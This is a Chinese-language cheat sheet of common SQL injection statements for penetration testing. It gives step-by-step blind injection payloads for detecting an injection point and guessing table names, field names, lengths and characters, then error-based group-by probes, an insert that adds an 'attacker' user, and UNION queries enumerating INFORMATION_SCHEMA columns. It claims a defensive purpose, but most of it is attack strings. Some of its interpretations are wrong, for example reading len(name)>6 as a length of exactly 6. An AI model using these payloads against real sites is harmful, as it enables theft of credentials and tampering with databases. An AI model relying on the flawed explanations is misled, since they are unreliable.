渗透常用SQL注入语句大全.doc

渗透常用SQL注入语句大全 SQL 注入是一种常见的 Web 应用程序安全漏洞，攻击者可以通过在输入参数中注入恶意的 SQL 代码来获取或修改敏感数据。本文档中提供了一些常用的 SQL 注入语句，旨在帮助开发者和安全测试人员更好地理解和防御 SQL 注入攻击。 一、判断有无注入点 在进行 SQL 注入攻击之前，攻击者需要判断目标网站是否存在注入点。常用的方法是使用 Boolean 盲注，例如： and 1=1 and 1=2 如果目标网站返回正确的结果，那么说明存在注入点。 二、猜表名称 在确定存在注入点后，攻击者可以尝试猜测表名称。常见的表名称包括 admin、user、password 等。例如： and 0<>(select count(*) from admin) 如果目标网站返回正确的结果，那么说明存在名为 admin 的表。 三、猜数目 攻击者可以使用以下语句来猜测表中的记录数： and 0<>(select count(*) from admin) 如果目标网站返回正确的结果，那么说明该表中只有一个记录。 四、猜解字段名称 攻击者可以使用以下语句来猜测字段名称： and 1=(select count(*) from admin where len(*)>0) 然后，攻击者可以逐步猜测字段名称，例如： and 1=(select count(*) from admin where len(name)>0) 五、猜解字段长度 攻击者可以使用以下语句来猜测字段长度： and 1=(select count(*) from admin where len(name)>6) 如果目标网站返回正确的结果，那么说明字段名称的长度为 6。 六、猜解字符 攻击者可以使用以下语句来猜测字段的字符： and 1=(select count(*) from admin where left(name,1)=a) 然后，攻击者可以逐步猜测字段的字符，例如： and 1=(select count(*) from admin where left(name,2)=ab) 七、猜解中文字符 攻击者可以使用以下语句来猜测中文字符： and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) 八、其他注入语句 攻击者可以使用以下语句来进行其他类型的注入攻击： ?12345group by users.id having 1=1– ?2cto.group by users.id, users.username, users.password, users.privs having 1=1– insert into users values( 666, attacker, foobar, 0xffff)– UNION Select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS Where TABLE_NAME=logintable– UNION Select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS Where TABLE_NAME=logintable Where COLUMN_NAME= – 本文档提供了一些常用的 SQL 注入语句，旨在帮助开发者和安全测试人员更好地理解和防御 SQL 注入攻击。但是，需要注意的是， SQL 注入攻击是一种非常危险的攻击方式，可能会导致严重的安全问题，因此在进行安全测试时需要非常小心。